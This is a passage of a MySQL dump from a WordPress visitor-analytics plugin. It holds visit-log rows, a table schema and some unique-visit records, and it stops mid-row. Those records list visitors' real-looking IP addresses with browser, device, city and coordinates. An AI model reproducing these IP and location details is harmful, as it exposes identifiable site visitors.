INSERT INTO `wp_wsm_logVisit` VALUES (1,1,'118a62e5107dd764',1,0,'-','2021-08-12 12:47:39',47,1),(2,1,'f5cea1b341f5eafa',2,4,'-','2021-08-12 13:05:22',1001,3),(3,1,'0dd2293c2a15c5fa',3,0,'-','2021-08-12 13:16:45',0,1),(4,1,'6453d95a8a5387f4',4,0,'-','2021-08-12 13:16:48',0,1),(5,1,'6453d95a8a5387f4',4,0,'-','2021-08-12 13:19:05',15,1),(6,1,'04cdc12042c4f67f',5,0,'-','2021-08-12 13:21:30',0,6),(7,1,'f5cea1b341f5eafa',2,4,'-','2021-08-12 13:22:05',3,3),(8,1,'b544bf0e99817d4e',6,4,'-','2021-08-12 13:41:40',1800,8),(9,1,'b6bdd91df3c41c68',7,0,'-','2021-08-12 14:26:59',1800,9),(10,1,'ec74cc298e6417a3',8,0,'-','2021-08-12 14:31:43',0,6),(11,1,'26f38ada2bbb1fbd',9,10,'-','2021-08-12 14:56:56',461,1),(12,1,'e7cdd3ea5571d92c',10,0,'-','2021-08-12 15:07:34',59,11),(13,1,'26f38ada2bbb1fbd',9,10,'-','2021-08-12 15:07:53',16,12),(14,1,'e7cdd3ea5571d92c',10,0,'-','2021-08-12 15:08:35',61,11),(15,1,'c0a9314dc63a7009',11,0,'-','2021-08-12 15:16:50',74,9),(16,1,'cf87b32218b0371c',12,0,'-','2021-08-12 15:18:15',0,15),(17,1,'c0a9314dc63a7009',11,0,'-','2021-08-12 15:18:28',98,9),(18,1,'9c4f066647846cdc',13,17,'-','2021-08-12 15:44:41',163,16),(19,1,'b544bf0e99817d4e',6,4,'-','2021-08-12 15:54:51',87,8),(20,1,'b544bf0e99817d4e',6,4,'-','2021-08-12 16:00:24',191,8),(21,1,'b544bf0e99817d4e',6,4,'-','2021-08-12 16:03:42',367,8),(22,1,'b544bf0e99817d4e',6,4,'-','2021-08-12 16:09:58',91,8),(23,1,'b544bf0e99817d4e',6,4,'-','2021-08-12 16:11:33',95,8),(24,1,'dc7ad7679c596808',14,4,'-','2021-08-12 17:00:14',1800,22),(25,1,'04cdc12042c4f67f',5,0,'-','2021-08-12 17:55:08',1800,6),(26,1,'f3b6f729d49c8bd1',15,0,'-','2021-08-12 18:15:00',895,6),(27,1,'e403afa26d31fe73',16,0,'-','2021-08-12 18:53:16',74,6),(28,1,'b6bdd91df3c41c68',7,0,'-','2021-08-12 19:11:32',1800,9),(29,1,'cbcf9845916ee09f',17,0,'-','2021-08-12 19:18:33',0,24),(30,1,'e14e00eab3c31a86',18,4,'-','2021-08-12 19:36:25',46,3),(31,1,'79573a4e844e785f',19,0,'-','2021-08-12 19:41:18',4,3),(32,1,'b6bdd91df3c41c68',7,0,'-','2021-08-12 19:46:09',1800,9),(33,1,'b6bdd91df3c41c68',7,0,'-','2021-08-12 19:46:14',3,6),(34,1,'b6bdd91df3c41c68',7,0,'-','2021-08-12 19:46:20',15,8),(35,1,'2d05fafe51eb7852',20,0,'-','2021-08-12 20:19:17',0,25),(36,1,'16d39bfe8c2a779e',21,0,'-','2021-08-12 20:29:43',0,26),(37,1,'f1199353911d7977',22,4,'-','2021-08-12 20:42:57',105,27),(38,1,'f1199353911d7977',22,4,'-','2021-08-12 20:45:07',18,27),(39,1,'c2b6249eafe7613d',23,0,'-','2021-08-12 20:55:30',30,1),(40,1,'13051adba4f13ad8',24,0,'-','2021-08-12 21:36:01',0,29),(41,1,'d68e79dcc3754725',25,0,'-','2021-08-12 21:36:56',0,29),(42,1,'94ea57bac25a930e',26,0,'-','2021-08-12 23:06:36',0,12),(43,1,'2c3f163cf4e456c6',27,0,'-','2021-08-12 23:26:09',0,1),(44,1,'97bc44393615646f',28,0,'-','2021-08-13 01:07:20',0,30),(45,1,'16eac28561f18e05',29,31,'-','2021-08-13 03:28:48',75,1),(46,1,'16eac28561f18e05',29,31,'-','2021-08-13 03:30:14',951,1),(47,1,'16eac28561f18e05',29,31,'-','2021-08-13 03:46:08',262,1),(48,1,'927a8dddfa409b1c',30,0,'-','2021-08-13 03:48:45',0,32),(49,1,'ac95b4cd9e9d394f',31,4,'-','2021-08-13 04:36:54',60,8),(50,1,'ac95b4cd9e9d394f',31,4,'-','2021-08-13 04:38:06',499,8),(51,1,'ac95b4cd9e9d394f',31,4,'-','2021-08-13 05:10:59',1800,34),(52,1,'de335d12e831eb9d',32,4,'-','2021-08-13 05:35:51',0,35),(53,1,'69568822807801b1',33,0,'-','2021-08-13 06:08:34',0,36),(54,1,'b6bdd91df3c41c68',34,0,'-','2021-08-13 06:51:16',0,0),(55,1,'ac95b4cd9e9d394f',31,4,'-','2021-08-13 06:52:50',247,34),(56,1,'9e863d032d64e958',35,4,'-','2021-08-13 07:03:33',0,37),(57,1,'ac95b4cd9e9d394f',31,4,'-','2021-08-13 07:08:32',127,34),(58,1,'ac95b4cd9e9d394f',31,4,'-','2021-08-13 07:10:40',21,34),(59,1,'ac95b4cd9e9d394f',31,4,'-','2021-08-13 07:10:41',194,38),(60,1,'66c16028e4fc14b1',36,4,'-','2021-08-13 08:08:22',296,39),(61,1,'66c16028e4fc14b1',36,4,'-','2021-08-13 08:13:20',296,39),(62,1,'66c16028e4fc14b1',36,4,'-','2021-08-13 08:13:26',52,9),(63,1,'5e7b6b1236e7f21e',37,0,'-','2021-08-13 08:15:25',0,5),(64,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 08:21:14',317,40),(65,1,'62ce99a7c7a87750',39,42,'-','2021-08-13 08:28:43',20,41),(66,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 08:48:26',45,5),(67,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 08:49:16',75,43),(68,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 08:50:42',60,5),(69,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 08:51:50',16,30),(70,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 08:52:20',346,16),(71,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 08:58:24',15,30),(72,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 08:58:49',11,44),(73,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 08:59:03',121,29),(74,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 09:01:18',3,44),(75,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 09:01:24',60,45),(76,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 09:02:26',3,44),(77,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 09:02:32',60,46),(78,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 09:03:47',31,44),(79,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 09:04:31',75,47),(80,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 09:05:57',15,44),(81,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 09:06:20',23,30),(82,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 09:06:32',12,5),(83,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 09:07:38',59,5),(84,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 09:09:03',9,5),(85,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 09:09:26',1800,40),(86,1,'faa64bc95737a19b',40,4,'-','2021-08-13 09:22:37',0,48),(87,1,'10f5e5a30344c4c5',41,0,'-','2021-08-13 09:31:11',0,36),(88,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 09:42:57',1800,5),(89,1,'a832dde1b73dad9b',42,10,'-','2021-08-13 10:42:23',1326,1),(90,1,'dc5e292012f9fb9d',43,49,'-','2021-08-13 11:02:01',0,40),(91,1,'ffcb56100c11a382',44,10,'-','2021-08-13 11:05:19',924,50),(92,1,'d2f6bbcc92e39cde',45,0,'-','2021-08-13 11:14:29',1800,25),(93,1,'f3f15963ae57a7f2',46,10,'-','2021-08-13 11:15:16',135,52),(94,1,'f3f15963ae57a7f2',46,10,'-','2021-08-13 11:31:40',75,52),(95,1,'25e9e59d695393ac',47,4,'-','2021-08-13 11:31:46',0,53),(96,1,'2bc670b86a9dd752',48,10,'-','2021-08-13 11:36:25',26,1),(97,1,'25e9e59d695393ac',47,4,'-','2021-08-13 11:36:55',120,53),(98,1,'25e9e59d695393ac',47,4,'-','2021-08-13 11:39:27',152,53),(99,1,'f3f15963ae57a7f2',46,10,'-','2021-08-13 11:54:52',1391,52),(100,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 12:09:37',30,38),(101,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 12:10:39',88,38),(102,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 12:12:22',16,5),(103,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 12:12:55',4,38),(104,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 12:13:35',16,5),(105,1,'97bd1d8707be45f3',49,0,'-','2021-08-13 12:14:03',75,56),(106,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 12:14:06',222,38),(107,1,'b1baa8df363a32fc',38,4,'-','2021-08-13 12:18:00',235,5),(108,1,'af6cde098b9eb2ae',50,10,'-','2021-08-13 12:18:49',17,1),(109,1,'39eb0453e33558de',51,0,'-','2021-08-13 12:42:16',0,58),(110,1,'ffcb56100c11a382',44,10,'-','2021-08-13 13:46:56',1800,50),(111,1,'443e17d9074b2205',52,4,'-','2021-08-13 13:48:43',55,1),(112,1,'443e17d9074b2205',52,4,'-','2021-08-13 13:49:48',10,1),(113,1,'443e17d9074b2205',52,4,'-','2021-08-13 13:52:38',108,1),(114,1,'443e17d9074b2205',52,4,'-','2021-08-13 13:55:03',116,1),(115,1,'6c0d1fcac162a302',53,17,'-','2021-08-13 13:59:38',8,61),(116,1,'6c0d1fcac162a302',53,17,'-','2021-08-13 13:59:49',60,8),(117,1,'6c0d1fcac162a302',53,17,'-','2021-08-13 14:00:55',66,61),(118,1,'b9a1cc9e53471194',54,0,'-','2021-08-13 15:07:54',0,8),(119,1,'f73af3570c03833e',55,4,'-','2021-08-13 17:41:27',30,34),(120,1,'5d98ffe7525f1254',56,0,'-','2021-08-13 20:04:14',0,50),(121,1,'2e09f959ce909e70',57,0,'-','2021-08-13 20:28:06',0,52),(122,1,'d7d01526a5770fb8',58,4,'-','2021-08-13 23:07:18',61,1),(123,1,'d7d01526a5770fb8',58,4,'-','2021-08-13 23:08:20',15,1),(124,1,'d7d01526a5770fb8',58,4,'-','2021-08-13 23:09:35',18,1),(125,1,'d7d01526a5770fb8',58,4,'-','2021-08-13 23:09:38',356,30),(126,1,'d7d01526a5770fb8',58,4,'-','2021-08-13 23:15:39',358,30),(127,1,'d7d01526a5770fb8',58,4,'-','2021-08-13 23:15:41',75,1),(128,1,'d7d01526a5770fb8',58,4,'-','2021-08-13 23:17:05',14,1),(129,1,'d7d01526a5770fb8',58,4,'-','2021-08-13 23:17:47',42,30),(130,1,'596252a0747c5d04',59,0,'-','2021-08-14 00:45:19',0,64),(131,1,'6565e9301cacfc54',60,0,'-','2021-08-14 01:47:02',0,65),(132,1,'52504b16aa88920a',61,0,'-','2021-08-14 03:42:24',0,66),(133,1,'58dd87a255484962',62,0,'-','2021-08-14 03:58:31',98,67),(134,1,'5d742a932d9b935e',63,0,'-','2021-08-14 08:45:21',0,30),(135,1,'851e3a7fbb3221f4',64,42,'-','2021-08-14 09:16:14',61,69),(136,1,'851e3a7fbb3221f4',64,42,'-','2021-08-14 09:17:28',75,25),(137,1,'851e3a7fbb3221f4',64,42,'-','2021-08-14 09:18:51',9,69),(138,1,'851e3a7fbb3221f4',64,42,'-','2021-08-14 09:24:28',1,25),(139,1,'30a0d1dbfe8ac4b8',65,31,'-','2021-08-14 09:48:52',0,70),(140,1,'54582b98ec3f0bad',66,71,'-','2021-08-14 10:50:04',0,5),(141,1,'53247ff94a6baa25',67,0,'-','2021-08-14 11:30:08',0,72),(142,1,'25ed96afa3180ed7',68,4,'-','2021-08-14 12:38:32',29,73),(143,1,'cbe63f5f35bb6b7c',69,4,'-','2021-08-14 12:44:36',107,39),(144,1,'a5f620902a18006e',70,75,'-','2021-08-14 13:14:41',0,74),(145,1,'ec93d559f345ef4f',71,42,'-','2021-08-14 13:22:57',0,69),(146,1,'d2f6bbcc92e39cde',72,0,'-','2021-08-14 13:56:46',0,0),(147,1,'4698baf817679530',73,0,'-','2021-08-14 16:12:07',0,39),(148,1,'f8e69f346f692304',74,4,'-','2021-08-14 16:17:32',15,76),(149,1,'1eee6a1beaa9d6cd',75,0,'-','2021-08-14 16:17:36',6,5),(150,1,'1eee6a1beaa9d6cd',75,0,'-','2021-08-14 16:17:48',1485,9),(151,1,'f11bda5756096970',76,0,'-','2021-08-14 17:51:00',0,77),(152,1,'62ac29814bddba7e',77,0,'-','2021-08-14 21:41:07',0,78),(153,1,'7f70394071d87bbf',78,4,'-','2021-08-14 22:23:48',0,70),(154,1,'2fd6daf60a9d540e',79,4,'-','2021-08-14 22:46:01',135,79),(155,1,'044bb3ca6f82588e',80,4,'-','2021-08-14 22:47:45',0,27),(156,1,'2fd6daf60a9d540e',79,4,'-','2021-08-14 22:48:22',141,79),(157,1,'e33b9b2d283372be',81,0,'-','2021-08-14 23:12:52',0,81),(158,1,'6d6c8d89cd1d69c8',82,4,'-','2021-08-14 23:21:54',710,1),(159,1,'319fc30070a83d31',83,0,'-','2021-08-14 23:23:27',0,34),(160,1,'ff3e561ef4799980',84,0,'-','2021-08-15 00:21:37',0,82),(161,1,'7f70394071d87bbf',85,4,'-','2021-08-15 00:42:24',0,70),(162,1,'d8621baf679cbdbd',86,0,'-','2021-08-15 01:25:34',0,30),(163,1,'1e4c0350fe175a9a',87,0,'-','2021-08-15 01:43:56',0,30),(164,1,'6b9be6cfa7c1c9ba',88,0,'-','2021-08-15 02:43:45',0,83),(165,1,'25ed96afa3180ed7',89,4,'-','2021-08-15 03:30:06',31,73),(166,1,'9b8e691ceb66d653',90,0,'-','2021-08-15 04:07:08',0,30),(167,1,'588835bb4aef61d0',91,0,'-','2021-08-15 04:08:07',0,84),(168,1,'6ff908afad68c9b0',92,0,'-','2021-08-15 04:17:13',0,77),(169,1,'27fde2a348f8d20a',93,4,'-','2021-08-15 04:31:15',0,77),(170,1,'6086ca20a0b9edd6',94,4,'-','2021-08-15 05:07:24',135,61),(171,1,'6086ca20a0b9edd6',94,4,'-','2021-08-15 05:09:51',53,61),(172,1,'7d6ee8e8d4b78679',95,4,'-','2021-08-15 05:15:36',2,86),(173,1,'7d6ee8e8d4b78679',95,4,'-','2021-08-15 05:16:39',8,86),(174,1,'de4ca55714767982',96,0,'-','2021-08-15 05:47:01',0,88),(175,1,'56ca87dbec5f23a3',97,0,'-','2021-08-15 07:19:57',0,1),(176,1,'77b3fb9392271f37',98,0,'-','2021-08-15 07:39:55',0,89),(177,1,'3e514f571887142c',99,4,'-','2021-08-15 08:14:01',42,27),(178,1,'5235c3903840a0ad',100,0,'-','2021-08-15 08:46:46',0,76),(179,1,'b544bf0e99817d4e',101,0,'-','2021-08-15 09:12:51',0,0),(180,1,'edd10b54c8d896c8',102,0,'-','2021-08-15 10:05:59',0,91),(181,1,'17429cc38c623408',103,0,'-','2021-08-15 10:13:02',0,92),(182,1,'648449973ac5b8b4',104,0,'-','2021-08-15 10:13:26',0,93),(183,1,'6c9f9974aea0e57f',105,4,'-','2021-08-15 10:23:56',10,15),(184,1,'775a2e1675a88ec6',106,0,'-','2021-08-15 10:31:15',0,94),(185,1,'1e2c7ce3869af143',107,4,'-','2021-08-15 11:25:31',195,9),(186,1,'b7583e6cfe0b4373',108,0,'-','2021-08-15 12:00:16',14,5),(187,1,'2a508f3d6be1b31c',109,0,'-','2021-08-15 12:58:41',2,79),(188,1,'01154596668d632c',110,4,'-','2021-08-15 13:18:06',180,93),(189,1,'01154596668d632c',110,4,'-','2021-08-15 13:21:08',181,93),(190,1,'01154596668d632c',110,4,'-','2021-08-15 13:30:53',31,93),(191,1,'469c35dceb756455',111,4,'-','2021-08-15 17:02:13',1514,95),(192,1,'84a3a08969d2eb8a',112,4,'-','2021-08-15 17:41:08',109,3),(193,1,'4eb77274864058b3',113,96,'-','2021-08-15 17:56:57',0,5),(194,1,'78f2eaf2450f5e17',114,0,'-','2021-08-15 19:31:28',0,1),(195,1,'14ec824eb56c0a61',115,0,'-','2021-08-15 19:31:34',155,1),(196,1,'14ec824eb56c0a61',115,0,'-','2021-08-15 19:34:13',320,1),(197,1,'eed025b413230de2',116,10,'-','2021-08-15 19:50:11',59,15),(198,1,'eed025b413230de2',116,10,'-','2021-08-15 19:51:20',2,15),(199,1,'eed025b413230de2',116,10,'-','2021-08-15 19:51:40',30,8),(200,1,'eed025b413230de2',116,10,'-','2021-08-15 19:52:16',121,30),(201,1,'35ade4f4cf9ae720',117,4,'-','2021-08-15 20:39:24',273,1),(202,1,'54aeeaa305c2d07b',118,0,'-','2021-08-15 21:04:53',0,5),(203,1,'3f5d47dc78b232ef',119,0,'-','2021-08-15 21:04:54',0,5),(204,1,'80d4cd36e25c22f8',120,0,'-','2021-08-15 21:10:14',0,1),(205,1,'f610306237ef4590',121,0,'-','2021-08-15 21:10:19',105,1),(206,1,'f610306237ef4590',121,0,'-','2021-08-15 21:12:17',17,1),(207,1,'69d2e21d0ab67c12',122,0,'-','2021-08-15 21:18:32',0,100),(208,1,'c82e8c56bf651386',123,0,'-','2021-08-15 21:55:23',0,30),(209,1,'c80ffda043965b73',124,0,'-','2021-08-16 02:46:00',0,5),(210,1,'c2cdd34939852ba3',125,0,'-','2021-08-16 02:50:24',0,5),(211,1,'14dd046cfeccbf47',126,0,'-','2021-08-16 03:08:44',0,30),(212,1,'36ee5e7e42414e29',127,0,'-','2021-08-16 03:53:01',0,101),(213,1,'fcce63e38eafc055',128,0,'-','2021-08-16 04:16:38',0,15),(214,1,'b1640d7482ec9c31',129,102,'-','2021-08-16 06:09:56',15,25),(215,1,'4ed041f0899d1ce1',130,0,'-','2021-08-16 06:41:13',0,1),(216,1,'14ec824eb56c0a61',131,0,'-','2021-08-16 06:41:14',0,1),(217,1,'6af09742ed1e9717',132,4,'-','2021-08-16 06:43:52',52,103),(218,1,'eb4bfaa3ce1fb5cf',133,4,'-','2021-08-16 06:48:11',0,34),(219,1,'d2f6bbcc92e39cde',134,0,'-','2021-08-16 07:31:34',14,25),(220,1,'e5444ec91216862b',135,4,'-','2021-08-16 07:38:15',15,32),(221,1,'e5444ec91216862b',135,4,'-','2021-08-16 07:38:37',62,79),(222,1,'e5444ec91216862b',135,4,'-','2021-08-16 07:39:39',195,79),(223,1,'e5444ec91216862b',135,4,'-','2021-08-16 07:43:02',12,32),(224,1,'e5444ec91216862b',135,4,'-','2021-08-16 07:43:09',49,79),(225,1,'e5444ec91216862b',135,4,'-','2021-08-16 07:44:15',1800,79),(226,1,'1eee6a1beaa9d6cd',136,0,'-','2021-08-16 08:03:49',1068,9),(227,1,'09150aced5a442ce',137,0,'-','2021-08-16 08:18:29',0,1),(228,1,'14ec824eb56c0a61',131,0,'-','2021-08-16 08:18:30',1800,1),(229,1,'61e8b34301bec640',138,4,'-','2021-08-16 10:51:28',140,105),(230,1,'854fac3f7fd0bad7',139,4,'-','2021-08-16 11:42:25',60,34),(231,1,'b6bdd91df3c41c68',140,0,'-','2021-08-16 11:43:47',30,0),(232,1,'0cc037f330e8e05d',141,4,'-','2021-08-16 12:27:40',23,1),(233,1,'50dcd8f3c0669e57',142,0,'-','2021-08-16 12:45:55',0,30),(234,1,'05e784600ab30bcb',143,4,'-','2021-08-16 12:45:56',51,61),(235,1,'f3b6f729d49c8bd1',144,0,'-','2021-08-16 12:47:48',11,5),(236,1,'72ccc58cc531a4a7',145,0,'-','2021-08-16 12:53:42',0,109),(237,1,'cb75fdebb2f7bec9',146,42,'-','2021-08-16 13:56:15',0,25),(238,1,'a89daab5b9145759',147,4,'-','2021-08-16 14:12:58',11,34),(239,1,'5d03e6e2c07bc2b6',148,10,'-','2021-08-16 14:35:37',1053,110),(240,1,'10eb57d621a2c8e3',149,4,'-','2021-08-16 14:43:27',0,32),(241,1,'5d1dc3380a63e831',150,4,'-','2021-08-16 16:00:25',30,79),(242,1,'f3b6f729d49c8bd1',144,0,'-','2021-08-16 16:00:49',1800,5),(243,1,'d2f6bbcc92e39cde',134,0,'-','2021-08-16 16:34:07',1800,25),(244,1,'9cde76db05af50e3',151,0,'-','2021-08-16 16:58:57',0,112),(245,1,'3df34b275f8ab168',152,4,'-','2021-08-16 17:22:41',91,1),(246,1,'3df34b275f8ab168',152,4,'-','2021-08-16 17:24:21',26,1),(247,1,'07f77ec486a9aa85',153,102,'-','2021-08-16 18:29:23',18,25),(248,1,'244126bbfce6bc1f',154,0,'-','2021-08-16 19:11:05',0,113),(249,1,'627191c64d3e64a1',155,0,'-','2021-08-16 20:43:34',0,114),(250,1,'4a91555aa9076c12',156,4,'-','2021-08-16 21:19:18',75,15),(251,1,'e77ccabe4333b8bf',157,0,'-','2021-08-16 21:52:52',0,115),(252,1,'1eee6a1beaa9d6cd',136,0,'-','2021-08-16 23:18:10',1800,5),(253,1,'4d355f2e698d9276',158,0,'-','2021-08-16 23:29:57',0,110),(254,1,'1eee6a1beaa9d6cd',136,0,'-','2021-08-16 23:50:24',572,5),(255,1,'1eee6a1beaa9d6cd',159,0,'-','2021-08-17 00:27:54',638,0),(256,1,'632a70ef6500ab8f',160,4,'-','2021-08-17 00:29:03',64,34),(257,1,'a5ea93a3a6e4c18c',161,0,'-','2021-08-17 00:30:03',0,116),(258,1,'1eee6a1beaa9d6cd',159,0,'-','2021-08-17 00:38:55',1097,9),(259,1,'57e82122fb25aca9',162,0,'-','2021-08-17 00:39:26',0,30),(260,1,'1eee6a1beaa9d6cd',159,0,'-','2021-08-17 00:57:23',1800,9),(261,1,'5812efa7882fe98f',163,0,'-','2021-08-17 01:33:13',0,38),(262,1,'1eee6a1beaa9d6cd',159,0,'-','2021-08-17 02:09:43',12,38),(263,1,'1eee6a1beaa9d6cd',159,0,'-','2021-08-17 02:10:07',16,5),(264,1,'1eee6a1beaa9d6cd',159,0,'-','2021-08-17 02:11:21',22,5),(265,1,'1eee6a1beaa9d6cd',159,0,'-','2021-08-17 02:11:25',98,118),(266,1,'1eee6a1beaa9d6cd',159,0,'-','2021-08-17 02:13:18',1357,5),(267,1,'8e7a43734640ad47',164,0,'-','2021-08-17 02:41:20',0,119),(268,1,'1eee6a1beaa9d6cd',159,0,'-','2021-08-17 03:15:50',15,120),(269,1,'1eee6a1beaa9d6cd',159,0,'-','2021-08-17 03:22:22',393,120),(270,1,'1eee6a1beaa9d6cd',159,0,'-','2021-08-17 03:25:55',168,5),(271,1,'1eee6a1beaa9d6cd',159,0,'-','2021-08-17 03:30:01',180,5),(272,1,'1eee6a1beaa9d6cd',159,0,'-','2021-08-17 03:33:03',79,5),(273,1,'1eee6a1beaa9d6cd',159,0,'-','2021-08-17 03:34:35',71,5),(274,1,'1eee6a1beaa9d6cd',159,0,'-','2021-08-17 03:35:50',95,5),(275,1,'1eee6a1beaa9d6cd',159,0,'-','2021-08-17 03:37:40',148,5),(276,1,'ac95b4cd9e9d394f',165,0,'-','2021-08-17 03:46:34',0,0),(277,1,'e5444ec91216862b',166,0,'-','2021-08-17 05:20:21',1800,0),(278,1,'f94d83ff4d7f02cc',167,0,'-','2021-08-17 06:20:36',3,116),(279,1,'fc3f6e6e31ec3791',168,10,'-','2021-08-17 06:36:02',0,27),(280,1,'21b48e16d271f8a4',169,0,'-','2021-08-17 07:17:19',0,123),(281,1,'b7583e6cfe0b4373',170,0,'-','2021-08-17 09:23:42',0,5),(282,1,'b0e1d6bc3f45101a',171,4,'-','2021-08-17 09:44:41',91,116),(283,1,'d6ac56b8ecfb1da5',172,4,'-','2021-08-17 10:13:46',56,1),(284,1,'0afb2863621b72c0',173,4,'-','2021-08-17 11:00:29',61,61),(285,1,'f3b6f729d49c8bd1',174,0,'-','2021-08-17 11:03:02',62,5),(286,1,'f3b6f729d49c8bd1',174,0,'-','2021-08-17 11:04:05',312,5),(287,1,'d066f21d35e0486b',175,4,'-','2021-08-17 12:35:58',103,1),(288,1,'742d254ce7c8b504',176,4,'-','2021-08-17 12:57:43',1195,35),(289,1,'10eb57d621a2c8e3',177,4,'-','2021-08-17 13:07:23',10,32),(290,1,'124902230f812c48',178,4,'-','2021-08-17 13:07:50',395,72),(291,1,'124902230f812c48',178,4,'-','2021-08-17 13:14:39',99,72),(292,1,'742d254ce7c8b504',176,4,'-','2021-08-17 13:17:44',1200,35),(293,1,'742d254ce7c8b504',176,4,'-','2021-08-17 13:24:38',15,35),(294,1,'f3b6f729d49c8bd1',174,0,'-','2021-08-17 14:48:02',1800,5),(295,1,'89accf6332f57339',179,0,'-','2021-08-17 15:11:40',0,16),(296,1,'4a0252386f76df8c',180,0,'-','2021-08-17 15:15:33',0,27),(297,1,'0827e8d1f0ada1db',181,0,'-','2021-08-17 15:23:13',859,1),(298,1,'b6bdd91df3c41c68',182,0,'-','2021-08-17 15:26:33',0,0),(299,1,'b6bdd91df3c41c68',182,0,'-','2021-08-17 15:26:35',2,8),(300,1,'b6bdd91df3c41c68',182,0,'-','2021-08-17 15:26:39',8,43),(301,1,'b6bdd91df3c41c68',182,0,'-','2021-08-17 15:26:48',1800,16),(302,1,'9e44b595b31a303c',183,4,'-','2021-08-17 15:57:10',59,27),(303,1,'9849b527b11cdaf5',184,4,'-','2021-08-17 16:02:18',15,5),(304,1,'145122fd602417c7',185,4,'-','2021-08-17 16:17:04',0,93),(305,1,'4966b9f59f1dfcb8',186,4,'-','2021-08-17 16:43:52',45,70),(306,1,'f1c36d2e6cffad3d',187,0,'-','2021-08-17 17:08:19',0,125);
/*!40000 ALTER TABLE `wp_wsm_logVisit` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wsm_loguniquevisit`
--

DROP TABLE IF EXISTS `wp_wsm_loguniquevisit`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wsm_loguniquevisit` (
  `id` bigint(10) unsigned NOT NULL AUTO_INCREMENT,
  `siteId` int(10) unsigned NOT NULL,
  `visitorId` varchar(20) NOT NULL,
  `visitLastActionTime` datetime NOT NULL,
  `configId` varchar(20) NOT NULL,
  `ipAddress` varchar(16) NOT NULL,
  `userId` varchar(200) DEFAULT NULL,
  `firstActionVisitTime` datetime NOT NULL,
  `daysSinceFirstVisit` smallint(5) unsigned DEFAULT NULL,
  `returningVisitor` tinyint(1) DEFAULT NULL,
  `visitCount` int(11) unsigned NOT NULL,
  `visitEntryURLId` int(11) unsigned DEFAULT NULL,
  `visitExitURLId` int(11) unsigned DEFAULT '0',
  `visitTotalActions` int(11) unsigned DEFAULT NULL,
  `refererUrlId` int(11) DEFAULT NULL,
  `browserLang` varchar(20) DEFAULT NULL,
  `browserId` int(11) unsigned DEFAULT NULL,
  `deviceType` varchar(20) DEFAULT NULL,
  `oSystemId` int(11) unsigned DEFAULT NULL,
  `currentLocalTime` time DEFAULT NULL,
  `daysSinceLastVisit` smallint(5) unsigned DEFAULT NULL,
  `totalTimeVisit` int(11) unsigned NOT NULL,
  `resolutionId` int(11) unsigned DEFAULT NULL,
  `cookie` tinyint(1) DEFAULT NULL,
  `director` tinyint(1) DEFAULT NULL,
  `flash` tinyint(1) DEFAULT NULL,
  `gears` tinyint(1) DEFAULT NULL,
  `java` tinyint(1) DEFAULT NULL,
  `pdf` tinyint(1) DEFAULT NULL,
  `quicktime` tinyint(1) DEFAULT NULL,
  `realplayer` tinyint(1) DEFAULT NULL,
  `silverlight` tinyint(1) DEFAULT NULL,
  `windowsmedia` tinyint(1) DEFAULT NULL,
  `city` varchar(255) DEFAULT NULL,
  `countryId` int(3) unsigned NOT NULL,
  `latitude` decimal(9,6) DEFAULT NULL,
  `longitude` decimal(9,6) DEFAULT NULL,
  `regionId` tinyint(2) DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `index_config_datetime` (`configId`,`visitLastActionTime`),
  KEY `index_datetime` (`visitLastActionTime`),
  KEY `index_idvisitor` (`visitorId`)
) ENGINE=InnoDB AUTO_INCREMENT=127 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wsm_loguniquevisit`
--

LOCK TABLES `wp_wsm_loguniquevisit` WRITE;
/*!40000 ALTER TABLE `wp_wsm_loguniquevisit` DISABLE KEYS */;
INSERT INTO `wp_wsm_loguniquevisit` VALUES (1,1,'118a62e5107dd764','2021-08-12 12:48:26','4ce6f62e4705134c','164.160.10.227','0','2021-08-12 12:47:39',0,0,1,1,2,1,0,'en-US',2,'Desktop',8,'12:47:37',0,48,20,1,0,0,0,0,1,0,0,0,0,'Tawalata',126,7.294400,-10.289200,0),(2,1,'f5cea1b341f5eafa','2021-08-12 13:22:08','015920a83a1dff04','41.191.107.138','0','2021-08-12 13:05:23',0,0,1,3,3,2,4,'en-us',4,'Mobile',11,'13:05:21',0,1006,25,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(3,1,'0dd2293c2a15c5fa','2021-08-12 13:16:45','c8662db60ec8ad1d','41.57.95.92','0','2021-08-12 13:16:45',0,0,1,1,1,1,0,'en-AU',2,'Mobile',10,'06:16:40',0,0,26,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(4,1,'6453d95a8a5387f4','2021-08-12 13:19:26','718f5a9ab64b85db','41.57.95.92','0','2021-08-12 13:16:48',0,0,1,1,5,2,0,'en-AU',2,'Mobile',10,'13:16:47',0,174,27,1,0,0,0,0,0,0,0,0,0,'',126,6.500000,-9.500000,0),(5,1,'04cdc12042c4f67f','2021-08-12 